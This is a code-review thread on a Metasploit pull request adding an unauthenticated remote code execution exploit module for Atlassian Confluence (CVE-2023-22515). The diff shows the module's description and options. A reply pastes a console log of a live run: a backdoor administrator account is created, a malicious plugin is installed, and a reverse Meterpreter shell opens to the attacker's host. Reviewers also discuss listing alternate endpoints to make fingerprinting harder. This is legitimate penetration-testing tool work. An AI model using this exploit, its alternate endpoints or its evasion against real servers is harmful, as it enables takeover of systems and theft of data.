modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,319 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Retry
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Confluence Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP
+          parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for
+          Java objects to be modified at run time. The exploit will create a new administrator user and  upload a
+          malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,
+          8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2023-22515'],
+          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'],
+          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
+        ],
+        'DisclosureDate' => '2023-10-04',
+        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default.
+        'Targets' => [
+          [
+            'Automatic',
+            {
+              'Platform' => 'java',
+              'Arch' => [ARCH_JAVA]
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          # Note we cannot delete the admin user we create, as Confluence prevents a user deleting themself.
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # By default Confluence listens for HTTP requests on TCP port 8090.
+        Opt::RPORT(8090),
+        # Confluence may have a non default base path, allow user to configure that here.
+        OptString.new('TARGETURI', [true, 'Base path for Confluence', '/']),
+        # The endpoint we target to trigger the vulnerability.
+        OptString.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', 'server-info.action']),
```

Comment:
Are there other possible endpoints?

Reply:
Yes, due to the nature of the vuln there are likely numerous endpoints that can be targeted, for example:

```
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > set CONFLUENCE_TARGET_ENDPOINT /ajax/spaceavailable.action
CONFLUENCE_TARGET_ENDPOINT => /ajax/spaceavailable.action
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Setting the application configuration's setupComplete to false via endpoint: /ajax/spaceavailable.action
[*] Creating a new administrator user account...
[*] Created fuhghwol:I2WHP3At
[*] Adding a malicious plugin...
[*] Waiting for plugin to be installed...
[*] Triggering payload...
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 192.168.86.50
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.50:62207) at 2023-10-17 09:12:53 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05$
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.86.50 - Meterpreter session 4 closed.  Reason: User exit
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > 
```

Reply:
It might be nice/interesting to provide a small list of possible ones I think, to make fingerprinting harder.

Reply:
I added some extra documentation via [c63aaba](https://github.com/rapid7/metasploit-framework/pull/18461/commits/c63aaba760a5af48971026d9d794c55e5f42dcd9) which mentions the other endpoint showed above.